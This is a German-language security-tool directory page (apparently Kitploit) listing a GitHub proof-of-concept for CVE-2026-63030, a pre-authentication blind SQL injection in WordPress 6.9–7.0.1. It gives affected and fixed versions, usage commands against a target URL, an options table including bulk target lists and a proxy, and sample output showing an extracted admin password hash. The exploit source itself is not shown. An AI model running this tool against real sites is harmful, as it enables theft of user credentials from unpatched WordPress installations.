Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-63030 — CVE-2026-63030 (wp2shell) POC. | Kitploit
Tools/GitHubGitHub/4minx/cve-2026-63030
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHub4minx/cve-2026-63030

CVE-2026-63030

CVE-2026-63030 (wp2shell) POC.

Repository anzeigen
8212vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-63030: wp2shell

WordPress Batch API Desynchronisation SQL-Injection-Exploit

Proof-of-Concept-Tool zur Extraktion von Benutzern und Passwort-Hashes über die Schwachstelle CVE-2026-63030 (wp2shell).


Schwachstelleninformationen

  • CVE: CVE-2026-63030 (wp2shell)
  • Begleit-CVE: CVE-2026-60137
  • Typ: Pre-Auth Blind SQL Injection
  • Betroffen: WordPress 6.9.0–6.9.4, 7.0.0–7.0.1
  • Behoben: 6.9.5, 7.0.2+

Verwendung

root@kitploit:~
python POC.py <target_url> [options]

Grundlegende Verwendung

root@kitploit:~
python POC.py --rest-route http://target.com

Optionen


Beispielausgabe:

root@kitploit:~
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553


Referenzen

  • Penligent Analysis - CVE-2026-63030 wp2shell
  • Rapid7 Labs - CVE-2026-63030: wp2shell a Critical Remote Code Execution Vulnerability in WordPress Core
  • WordPress 7.0.2 Security Release
Tool herunterladen
ArgumentBeschreibungStandard
targetEinzelne Ziel-URL-
-l, --listDatei mit Liste von Zielen (eine pro Zeile)-
--prefixDatenbanktabellen-Präfixwp_
--rest-route?rest_route= verwendenDeaktiviert
--timeoutRequest-Timeout (Sekunden)30
--proxyHTTP-Proxy (Burp/ZAP-kompatibel)Keine
--max-lenMaximale Extraktionslänge255